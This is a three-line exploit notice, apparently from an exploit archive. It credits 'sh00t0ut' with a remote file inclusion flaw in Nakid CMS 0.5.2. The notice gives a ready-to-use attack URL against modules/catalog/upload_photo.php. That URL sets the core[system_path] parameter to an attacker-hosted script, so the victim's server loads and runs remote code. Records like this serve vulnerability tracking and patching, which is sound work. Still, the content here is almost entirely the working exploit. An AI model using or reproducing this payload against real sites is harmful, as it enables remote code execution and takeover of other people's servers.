[~] Nakid CMS 0.5.2 Remote Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/modules/catalog/upload_photo.php?core[system_path]=[evil script]